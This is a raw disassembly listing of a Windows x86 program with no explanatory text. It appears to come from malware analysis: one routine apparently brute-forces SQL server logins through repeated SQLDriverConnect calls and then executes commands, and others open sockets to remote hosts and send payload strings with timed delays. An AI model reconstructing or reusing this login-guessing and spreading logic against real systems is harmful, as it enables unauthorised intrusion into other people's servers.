mov ecx, edi
call sub_4051D0
mov eax, [ebx+4]
test eax, eax
jnz short loc_4050F4
mov eax, 424280h
loc_4050F4: ; CODE XREF: sub_40507D+70�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_405141
; ---------------------------------------------------------------------------
loc_405108: ; CODE XREF: sub_40507D+4A�j
; sub_40507D+4E�j ...
push 1
push esi
mov ecx, edi
call sub_40514A
test al, al
jz short loc_405141
mov eax, [ebp+arg_0]
mov eax, [eax+4]
test eax, eax
jnz short loc_405125
mov eax, 424280h
loc_405125: ; CODE XREF: sub_40507D+A1�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_417A40
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_405141: ; CODE XREF: sub_40507D+46�j
; sub_40507D+89�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_40507D endp
; =============== S U B R O U T I N E =======================================
sub_40514A proc near ; CODE XREF: sub_404BA0+3D�p
; sub_404FCB+28�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_40515C
call sub_422DA0
loc_40515C: ; CODE XREF: sub_40514A+B�j
mov eax, [esi+4]
xor edx, edx
cmp eax, edx
jz short loc_405184
mov cl, [eax-1]
cmp cl, dl
jz short loc_405184
cmp cl, 0FFh
jz short loc_405184
cmp edi, edx
mov ecx, esi
jnz short loc_4051C3
dec byte ptr [eax-1]
push edx
loc_40517B: ; CODE XREF: sub_40514A+48�j
call sub_4051D0
loc_405180: ; CODE XREF: sub_40514A+4C�j
; sub_40514A+53�j
xor al, al
jmp short loc_4051CB
; ---------------------------------------------------------------------------
loc_405184: ; CODE XREF: sub_40514A+19�j
; sub_40514A+20�j ...
cmp edi, edx
jnz short loc_40519F
cmp [esp+8+arg_4], dl
jz short loc_405194
push 1
mov ecx, esi
jmp short loc_40517B
; ---------------------------------------------------------------------------
loc_405194: ; CODE XREF: sub_40514A+42�j
cmp eax, edx
jz short loc_405180
mov [esi+8], edx
mov [eax], dl
jmp short loc_405180
; ---------------------------------------------------------------------------
loc_40519F: ; CODE XREF: sub_40514A+3C�j
cmp [esp+8+arg_4], dl
jz short loc_4051BC
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_4051B1
cmp eax, edi
jnb short loc_4051C9
loc_4051B1: ; CODE XREF: sub_40514A+61�j
push 1
mov ecx, esi
call sub_4051D0
jmp short loc_4051C1
; ---------------------------------------------------------------------------
loc_4051BC: ; CODE XREF: sub_40514A+59�j
cmp [esi+0Ch], edi
jnb short loc_4051C9
loc_4051C1: ; CODE XREF: sub_40514A+70�j
mov ecx, esi
loc_4051C3: ; CODE XREF: sub_40514A+2B�j
push edi
call sub_4052A4
loc_4051C9: ; CODE XREF: sub_40514A+65�j
; sub_40514A+75�j
mov al, 1
loc_4051CB: ; CODE XREF: sub_40514A+38�j
pop edi
pop esi
retn 8
sub_40514A endp
; =============== S U B R O U T I N E =======================================
sub_4051D0 proc near ; CODE XREF: sub_404BA0+1F�p
; sub_404BA0+16B�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_4051F8
mov eax, [esi+4]
test eax, eax
jz short loc_4051F8
dec eax
mov cl, [eax]
test cl, cl
jz short loc_4051F1
cmp cl, 0FFh
jz short loc_4051F1
dec byte ptr [eax]
jmp short loc_4051F8
; ---------------------------------------------------------------------------
loc_4051F1: ; CODE XREF: sub_4051D0+16�j
; sub_4051D0+1B�j
push eax ; lpMem
call sub_41889B
pop ecx
loc_4051F8: ; CODE XREF: sub_4051D0+8�j
; sub_4051D0+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_4051D0 endp
; =============== S U B R O U T I N E =======================================
sub_405208 proc near ; CODE XREF: .text:00404F2E�p
; sub_405361+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
push edi
mov esi, ecx
call sub_40514A
test al, al
jz short loc_405236
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_417A40
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_405236: ; CODE XREF: sub_405208+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_405208 endp
; =============== S U B R O U T I N E =======================================
sub_40523D proc near ; CODE XREF: sub_40507D+35�p
; sub_40507D+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_405250
call sub_422FCC
loc_405250: ; CODE XREF: sub_40523D+C�j
mov ecx, edi
call sub_405361
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_405266
mov ebx, eax
loc_405266: ; CODE XREF: sub_40523D+25�j
test ebx, ebx
jbe short loc_40529C
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_4188B0
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_40514A
test al, al
jz short loc_40529C
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_40529C: ; CODE XREF: sub_40523D+2B�j
; sub_40523D+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_40523D endp
; =============== S U B R O U T I N E =======================================
sub_4052A4 proc near ; CODE XREF: sub_40514A+7A�p
mov eax, offset loc_423860
call sub_41887C
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_4052CA
mov edi, [ebp+8]
loc_4052CA: ; CODE XREF: sub_4052A4+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_4052D7
xor eax, eax
loc_4052D7: ; CODE XREF: sub_4052A4+2F�j
push eax
call sub_418BE5
pop ecx
mov [ebp+8], eax
jmp short loc_405308
; ---------------------------------------------------------------------------
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_4052F2
xor eax, eax
loc_4052F2: ; CODE XREF: sub_4052A4+4A�j
push eax
call sub_418BE5
mov [ebp+8], eax
pop ecx
mov eax, offset loc_405302
retn
; ---------------------------------------------------------------------------
loc_405302: ; DATA XREF: sub_4052A4+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_405308: ; CODE XREF: sub_4052A4+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_405326
cmp eax, edi
jbe short loc_405315
mov eax, edi
loc_405315: ; CODE XREF: sub_4052A4+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_417A40
add esp, 0Ch
loc_405326: ; CODE XREF: sub_4052A4+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_4051D0
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_405346
mov edi, ebx
loc_405346: ; CODE XREF: sub_4052A4+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [edi+eax], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_4052A4 endp
; =============== S U B R O U T I N E =======================================
sub_405361 proc near ; CODE XREF: sub_40523D+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_40538E
mov al, [esi-1]
test al, al
jz short loc_40538E
cmp al, 0FFh
jz short loc_40538E
push 1
call sub_4051D0
push esi
call sub_4180D0
pop ecx
push eax
push esi
mov ecx, edi
call sub_405208
loc_40538E: ; CODE XREF: sub_405361+9�j
; sub_405361+10�j ...
pop edi
pop esi
retn
sub_405361 endp
; ---------------------------------------------------------------------------
test byte_445EDC+0D46D8h, 1
jnz short loc_4053A1
or byte_445EDC+0D46D8h, 1
loc_4053A1: ; CODE XREF: .text:00405398�j
jmp $+5
push offset nullsub_1
call sub_418C60
pop ecx
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0E30h
mov al, CommandLine
push esi
mov [ebp-1], al
lea eax, [ebp-14h]
xor esi, esi
push eax
push esi
push 1
mov dword ptr [ebp-30h], 42972Ch
mov dword ptr [ebp-2Ch], 429724h
mov dword ptr [ebp-28h], 42971Ch
mov [ebp-24h], esi
mov [ebp-1Ch], esi
mov [ebp-10h], esi
mov [ebp-0Ch], esi
call SQLAllocHandle
test ax, ax
jnz short loc_405410
push 0FFFFFFFAh
push 3
push 0C8h
push dword ptr [ebp-14h]
call SQLSetEnvAttr
test ax, ax
jz short loc_405417
loc_405410: ; CODE XREF: .text:004053F7�j
xor eax, eax
jmp loc_405648
; ---------------------------------------------------------------------------
loc_405417: ; CODE XREF: .text:0040540E�j
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-14h]
push 2
call SQLAllocHandle
test ax, ax
jnz loc_40563B
push ebx
push edi
mov edi, Sleep
mov [ebp-8], esi
mov ebx, 431644h
loc_40543F: ; CODE XREF: .text:00405591�j
cmp dword ptr unk_4317D0, esi
mov [ebp-18h], esi
jz loc_405587
mov eax, 4317D0h
mov esi, eax
loc_405455: ; CODE XREF: .text:004054CF�j
lea ecx, [ebp-1]
push ecx
push dword ptr [eax]
mov eax, [ebp-8]
push dword ptr [ebp+eax*4-30h]
lea eax, [ebp+0Ch]
push dword ptr [ebp+0A8h]
push eax
lea eax, [ebp-0A30h]
push 4296E8h
push eax
call sub_41795B
add esp, 1Ch
lea eax, [ebp-1Eh]
push 0
push eax
lea eax, [ebp-0E30h]
push 400h
push eax
lea eax, [ebp-0A30h]
push eax
call sub_4180D0
pop ecx
push eax
lea eax, [ebp-0A30h]
push eax
push 0
push dword ptr [ebp-10h]
call SQLDriverConnect
test ax, ax
jz short loc_4054D6
cmp ax, 1
jz short loc_4054D6
push 1F4h
call edi ; Sleep
inc dword ptr [ebp-18h]
add esi, 4
mov eax, esi
cmp dword ptr [esi], 0
jnz short loc_405455
jmp loc_405585
; ---------------------------------------------------------------------------
loc_4054D6: ; CODE XREF: .text:004054B5�j
; .text:004054BB�j
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push 3
call SQLAllocHandle
push ebx
push ebx
call sub_4179B7
push eax
call sub_4179B7
push eax
push dword_4410C0
push dword ptr [ebp+8]
call sub_40B972
pop ecx
push eax
lea eax, [ebp-630h]
push 429658h
push eax
call sub_41795B
add esp, 20h
lea eax, [ebp-630h]
push 0FFFFFFFDh
push eax
push dword ptr [ebp-0Ch]
call SQLExecDirect
test ax, ax
jz short loc_40557A
mov esi, 1388h
push esi
call edi ; Sleep
push ebx
lea eax, [ebp-630h]
push 429638h
push eax
call sub_41795B
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-230h]
push 4295FCh
push eax
call sub_41795B
add esp, 18h
lea eax, [ebp-630h]
push 0FFFFFFFDh
push eax
push dword ptr [ebp-0Ch]
call SQLExecDirect
test ax, ax
jz short loc_40559C
push esi
call edi ; Sleep
loc_40557A: ; CODE XREF: .text:0040552C�j
push dword ptr [ebp-0Ch]
push 3
call SQLFreeHandle
loc_405585: ; CODE XREF: .text:004054D1�j
xor esi, esi
loc_405587: ; CODE XREF: .text:00405448�j
inc dword ptr [ebp-8]
mov eax, [ebp-8]
cmp [ebp+eax*4-30h], esi
jnz loc_40543F
jmp loc_40562B
; ---------------------------------------------------------------------------
loc_40559C: ; CODE XREF: .text:00405575�j
mov eax, [ebp-18h]
mov dword ptr [ebp-1Ch], 1
push dword ptr unk_4317D0[eax*4]
mov eax, [ebp-8]
push dword ptr [ebp+eax*4-30h]
lea eax, [ebp+0Ch]
push dword ptr [ebp+0A8h]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, 42B602h
push eax
push 4295B8h
lea eax, [ebp-230h]
push 200h
push eax
call sub_417EDA
add esp, 20h
cmp dword ptr [ebp+0BCh], 0
jnz short loc_40560D
push 0
lea eax, [ebp-230h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_40E1D6
add esp, 14h
loc_40560D: ; CODE XREF: .text:004055ED�j
lea eax, [ebp-230h]
push eax
call sub_40CB08
mov eax, [ebp+0B0h]
pop ecx
shl eax, 6
lea eax, [eax+42B628h]
inc dword ptr [eax]
loc_40562B: ; CODE XREF: .text:00405597�j
push dword ptr [ebp-10h]
push 2
call SQLFreeHandle
mov esi, [ebp-1Ch]
pop edi
pop ebx
loc_40563B: ; CODE XREF: .text:00405429�j
push dword ptr [ebp-14h]
push 1
call SQLFreeHandle
mov eax, esi
loc_405648: ; CODE XREF: .text:00405412�j
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40564B(SOCKET s, char cp, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, u_short hostshort)
sub_40564B proc near ; CODE XREF: .text:004057CA�p
buf = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
name = sockaddr ptr -10h
s = dword ptr 8
cp = byte ptr 0Ch
hostshort = word ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+name]
push esi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+cp]
mov [ebp+name.sa_family], 2
push eax ; cp
call inet_addr ; inet_addr
push dword ptr [ebp+hostshort] ; hostshort
mov dword ptr [ebp+name.sa_data+2], eax
call htons ; htons
push esi ; protocol
push 1 ; type
push 2 ; af
mov word ptr [ebp+name.sa_data], ax
call socket ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_405719
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push ebx ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jz short loc_405719
mov edi, 400h
push esi ; flags
mov esi, recv
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push ebx ; s
call esi ; recv
mov eax, 431644h
push eax
push eax
push dword_4410C0
push [ebp+s] ; s
call sub_40B972
pop ecx
push eax
push 42A948h
lea eax, [ebp+var_1A0]
push 190h
push eax
call sub_417EDA
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0 ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+var_1A0]
push eax ; buf
push ebx ; s
call send ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40571D
loc_405719: ; CODE XREF: sub_40564B+50�j
; sub_40564B+62�j
xor eax, eax
jmp short loc_405734
; ---------------------------------------------------------------------------
loc_40571D: ; CODE XREF: sub_40564B+CC�j
push 0 ; flags
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push ebx ; s
call esi ; recv
push ebx ; s
call closesocket ; closesocket
xor eax, eax
inc eax
loc_405734: ; CODE XREF: sub_40564B+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40564B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+0Ch]
push edi
push eax
mov word ptr [ebp-10h], 2
call inet_addr_0
push dword ptr [ebp+0A8h]
mov [ebp-0Ch], eax
call htons_2
push 6
push 1
push 2
mov [ebp-0Eh], ax
call socket ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4057AB
lea eax, [ebp-10h]
push 10h
push eax
push esi
call connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40578C
push esi
jmp short loc_4057A5
; ---------------------------------------------------------------------------
loc_40578C: ; CODE XREF: .text:00405787�j
push 0
push 1213h
push 429730h
push esi
call send ; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_4057AF
loc_4057A5: ; CODE XREF: .text:0040578A�j
call closesocket ; closesocket
loc_4057AB: ; CODE XREF: .text:00405775�j
xor eax, eax
jmp short loc_4057ED
; ---------------------------------------------------------------------------
loc_4057AF: ; CODE XREF: .text:004057A3�j
call closesocket ; closesocket
push 216Bh
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40564B
add esp, 0C0h
test eax, eax
jz short loc_4057EA
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, [eax+42B628h]
inc dword ptr [eax]
loc_4057EA: ; CODE XREF: .text:004057D7�j
xor eax, eax
inc eax
loc_4057ED: ; CODE XREF: .text:004057AD�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4057F1(SOCKET s, int, int)
sub_4057F1 proc near ; CODE XREF: .text:00405A57�p
; .text:00405A74�p ...
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_6 = word ptr -6
var_4 = word ptr -4
buf = byte ptr -2
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push esi
push edi
mov esi, 4410B8h
lea edi, [ebp+var_10]
mov ax, word ptr unk_42A9CC
movsd
movsb
mov esi, 4410B0h
lea edi, [ebp+var_18]
mov word ptr [ebp+buf], ax
mov ax, word ptr unk_42A9C8
movsd
mov [ebp+var_6], ax
mov ax, word ptr byte_440FAC
movsw
mov [ebp+var_4], ax
mov eax, [ebp+arg_8]
xor esi, esi
cmp eax, esi
jnz loc_4058BA
mov edi, [ebp+s]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+arg_8], esi
loc_405843: ; CODE XREF: sub_4057F1+C4�j
mov eax, [ebp+arg_8]
sub eax, esi
jz short loc_405860
dec eax
jnz short loc_4058AE
push esi ; flags
lea eax, [ebp+buf]
push 1 ; len
push eax ; buf
push edi ; s
call send_0
lea eax, [ebp+var_4]
jmp short loc_405871
; ---------------------------------------------------------------------------
loc_405860: ; CODE XREF: sub_4057F1+57�j
push esi ; flags
lea eax, [ebp+buf]
push 1 ; len
push eax ; buf
push edi ; s
call send_0
lea eax, [ebp+var_6]
loc_405871: ; CODE XREF: sub_4057F1+6D�j
push esi ; flags
push 1 ; len
push eax ; buf
push edi ; s
call send_0
push ebx
call sub_4180D0
pop ecx
cmp eax, 2
push esi ; flags
jnz short loc_405890
push 4
lea eax, [ebp+var_10]
jmp short loc_405895
; ---------------------------------------------------------------------------
loc_405890: ; CODE XREF: sub_4057F1+96�j
push 5 ; len
lea eax, [ebp+var_18]
loc_405895: ; CODE XREF: sub_4057F1+9D�j
push eax ; buf
push edi ; s
call send_0
push esi ; flags
push ebx
call sub_4180D0
pop ecx
push eax ; len
push ebx ; buf
push edi ; s
call send_0
loc_4058AE: ; CODE XREF: sub_4057F1+5A�j
inc [ebp+arg_8]
cmp [ebp+arg_8], 1
jle short loc_405843
pop ebx
jmp short loc_40592D
; ---------------------------------------------------------------------------
loc_4058BA: ; CODE XREF: sub_4057F1+42�j
dec eax
jz short loc_4058D6
dec eax
jnz short loc_40592D
mov edi, [ebp+s]
push esi ; flags
lea eax, [ebp+buf]
push 1 ; len
push eax ; buf
push edi ; s
call send_0
lea eax, [ebp+var_4]
jmp short loc_4058EA
; ---------------------------------------------------------------------------
loc_4058D6: ; CODE XREF: sub_4057F1+CA�j
mov edi, [ebp+s]
push esi ; flags
lea eax, [ebp+buf]
push 1 ; len
push eax ; buf
push edi ; s
call send_0
lea eax, [ebp+var_6]
loc_4058EA: ; CODE XREF: sub_4057F1+E3�j
push esi ; flags
push 1 ; len
push eax ; buf
push edi ; s
call send_0
push [ebp+arg_4]
call sub_4180D0
pop ecx
cmp eax, 2
push esi ; flags
jnz short loc_40590B
push 4
lea eax, [ebp+var_10]
jmp short loc_405910
; ---------------------------------------------------------------------------
loc_40590B: ; CODE XREF: sub_4057F1+111�j
push 5 ; len
lea eax, [ebp+var_18]
loc_405910: ; CODE XREF: sub_4057F1+118�j
push eax ; buf
push edi ; s
call send_0
push esi ; flags
push [ebp+arg_4]
call sub_4180D0
pop ecx
push eax ; len
push [ebp+arg_4] ; buf
push edi ; s
call send_0
loc_40592D: ; CODE XREF: sub_4057F1+C7�j
; sub_4057F1+CD�j
pop edi
pop esi
leave
retn
sub_4057F1 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
mov esi, 42A9F8h
lea edi, [ebp-38h]
mov ax, word ptr unk_42A9C8
movsd
movsd
movsd
movsb
mov esi, 42A9F4h
lea edi, [ebp-14h]
movsw
movsb
mov esi, 4410B8h
lea edi, [ebp-28h]
movsd
movsb
mov esi, 42A9F0h
lea edi, [ebp-10h]
movsw
movsb
mov esi, 42A9ECh
lea edi, [ebp-0Ch]
movsw
movsb
xor esi, esi
mov [ebp-2], ax
mov [ebp-4], ax
mov ax, word ptr unk_42A9E8
push esi
push 1
push 2
mov [ebp-6], ax
xor edi, edi
call socket_0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp-1Ch], ebx
jnz short loc_4059AC
push eax
call closesocket_0
loc_4059AC: ; CODE XREF: .text:004059A3�j
lea eax, [ebp+0Ch]
mov word ptr [ebp-48h], 2
push eax
call inet_addr_0
push dword ptr [ebp+0A8h]
mov [ebp-44h], eax
call htons_2
mov [ebp-46h], ax
lea eax, [ebp-48h]
push 10h
push eax
push ebx
call connect_0
test eax, eax
jnz loc_405C7E
loc_4059E4: ; CODE XREF: .text:00405CBC�j
; .text:00405CF4�j
push 40h
lea eax, [ebp-88h]
push esi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp-88h]
push esi
push 40h
push eax
push ebx
call recv_0
cmp eax, esi
jle short loc_405A42
cmp eax, 0FFFFFFFFh
jz short loc_405A42
mov eax, edi
sub eax, esi
jz loc_405CC1
dec eax
jz loc_405C8C
dec eax
jnz loc_405CF1
lea eax, [ebp-28h]
push eax
lea eax, [ebp-88h]
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_405C7E
loc_405A42: ; CODE XREF: .text:00405A09�j
; .text:00405A0E�j ...
push esi
lea eax, [ebp-4]
push 1
push eax
push ebx
call send_0
lea eax, [ebp-10h]
push 1
push eax
push ebx
call sub_4057F1
mov esi, Sleep
add esp, 0Ch
mov edi, 3E8h
push edi
call esi ; Sleep
lea eax, [ebp-6]
push 0
push eax
push ebx
call sub_4057F1
add esp, 0Ch
push edi
call esi ; Sleep
lea eax, [ebp-10h]
push 2
push eax
push ebx
call sub_4057F1
add esp, 0Ch
push edi
call esi ; Sleep
and dword ptr [ebp-18h], 0
push 42A9BCh
call sub_4180D0
test eax, eax
pop ecx
mov ebx, 42A9E4h
jbe short loc_405AE8
loc_405AA9: ; CODE XREF: .text:00405AE6�j
mov eax, [ebp-18h]
movsx eax, byte ptr [eax+42A9BCh]
push eax
push ebx
lea eax, [ebp-20h]
push 3
push eax
call sub_417EDA
lea eax, [ebp-20h]
push 0
push eax
push dword ptr [ebp-1Ch]
call sub_4057F1
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-18h]
push 42A9BCh
call sub_4180D0
cmp [ebp-18h], eax
pop ecx
jb short loc_405AA9
loc_405AE8: ; CODE XREF: .text:00405AA7�j
lea eax, [ebp-0Ch]
push 0
push eax
push dword ptr [ebp-1Ch]
call sub_4057F1
add esp, 0Ch
push 7D0h
call esi ; Sleep
push 100h
push 0
push 440FB0h
call sub_4179E0
add esp, 0Ch
push 431644h
push dword ptr [ebp+8]
call sub_40B972
pop ecx
push eax
push 42A9D0h
push 0FFh
push 440FB0h
call sub_417EDA
and dword ptr [ebp-18h], 0
push 440FB0h
call sub_4180D0
add esp, 18h
test eax, eax
jbe short loc_405B8B
loc_405B4C: ; CODE XREF: .text:00405B89�j
mov eax, [ebp-18h]
movsx eax, byte ptr [eax+440FB0h]
push eax
push ebx
lea eax, [ebp-20h]
push 3
push eax
call sub_417EDA
lea eax, [ebp-20h]
push 0
push eax
push dword ptr [ebp-1Ch]
call sub_4057F1
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-18h]
push 440FB0h
call sub_4180D0
cmp [ebp-18h], eax
pop ecx
jb short loc_405B4C
loc_405B8B: ; CODE XREF: .text:00405B4A�j
push edi
call esi ; Sleep
lea eax, [ebp-0Ch]
push 0
push eax
push dword ptr [ebp-1Ch]
call sub_4057F1
add esp, 0Ch
push 7530h
call esi ; Sleep
and dword ptr [ebp-18h], 0
push 431644h
call sub_4180D0
test eax, eax
pop ecx
jbe short loc_405BF8
loc_405BB9: ; CODE XREF: .text:00405BF6�j
mov eax, [ebp-18h]
movsx eax, byte ptr [eax+431644h]
push eax
push ebx
lea eax, [ebp-20h]
push 3
push eax
call sub_417EDA
lea eax, [ebp-20h]
push 0
push eax
push dword ptr [ebp-1Ch]
call sub_4057F1
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-18h]
push 431644h
call sub_4180D0
cmp [ebp-18h], eax
pop ecx
jb short loc_405BB9
loc_405BF8: ; CODE XREF: .text:00405BB7�j
push edi
call esi ; Sleep
lea eax, [ebp-0Ch]
push 0
push eax
push dword ptr [ebp-1Ch]
call sub_4057F1
and dword ptr [ebp-18h], 0
mov edi, 42A9C0h
push edi
call sub_4180D0
add esp, 10h
test eax, eax
jbe short loc_405C5A
loc_405C1F: ; CODE XREF: .text:00405C58�j
mov eax, [ebp-18h]
movsx eax, byte ptr [eax+42A9C0h]
push eax
push ebx
lea eax, [ebp-20h]
push 3
push eax
call sub_417EDA
lea eax, [ebp-20h]
push 0
push eax
push dword ptr [ebp-1Ch]
call sub_4057F1
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-18h]
push edi
call sub_4180D0
cmp [ebp-18h], eax
pop ecx
jb short loc_405C1F
loc_405C5A: ; CODE XREF: .text:00405C1D�j
push 2
pop edi
loc_405C5D: ; CODE XREF: .text:00405C76�j
push 258h
call esi ; Sleep
lea eax, [ebp-0Ch]
push 0
push eax
push dword ptr [ebp-1Ch]
call sub_4057F1
add esp, 0Ch
dec edi
jnz short loc_405C5D
mov ebx, [ebp-1Ch]
xor esi, esi
inc esi
loc_405C7E: ; CODE XREF: .text:004059DE�j
; .text:00405A3C�j ...
push ebx
call closesocket_0
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_405C8C: ; CODE XREF: .text:00405A1B�j
lea eax, [ebp-14h]
push eax
lea eax, [ebp-88h]
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_405C7E
lea eax, [ebp-2]
push esi
push eax
call sub_4180D0
pop ecx
push eax
lea eax, [ebp-2]
push eax
push ebx
call send_0
push 2
pop edi
jmp loc_4059E4
; ---------------------------------------------------------------------------
loc_405CC1: ; CODE XREF: .text:00405A14�j
lea eax, [ebp-38h]
push eax
lea eax, [ebp-88h]
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_405C7E
lea eax, [ebp-38h]
push esi
push eax
call sub_4180D0
pop ecx
push eax
lea eax, [ebp-38h]
push eax
push ebx
call send_0
xor edi, edi
inc edi
loc_405CF1: ; CODE XREF: .text:00405A22�j
cmp edi, 3
jnz loc_4059E4
jmp loc_405A42
; ---------------------------------------------------------------------------
jmp $+5
push 0FFFFh
push 539h
call sub_4164B5
pop ecx
mov dword_4410C0, eax
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_405D1B(LPVOID)
sub_405D1B proc near ; DATA XREF: sub_407B48+267�o
WSAData = WSAData ptr -0A6Ch
var_8DC = dword ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C8 = dword ptr -4C8h
var_4C4 = dword ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
readfds = fd_set ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
buf = byte ptr -29Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
addr = sockaddr ptr -134h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
cp = byte ptr -48h
name = sockaddr ptr -38h
argp = dword ptr -28h
optval = byte ptr -24h
var_20 = byte ptr -20h
addrlen = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
s = dword ptr -0Ch
hostshort = word ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A6Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6DC]
inc ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+WSAData]
xor edi, edi
push eax ; lpWSAData
push 101h ; wVersionRequested
mov dword ptr [ebp+optval], ebx
mov [ebp+argp], ebx
mov [ebp+var_238], edi
mov [ebp+readfds.fd_count], edi
call WSAStartup ; WSAStartup
mov eax, [ebp+var_4C8]
push edi ; protocol
push ebx ; type
push 2 ; af
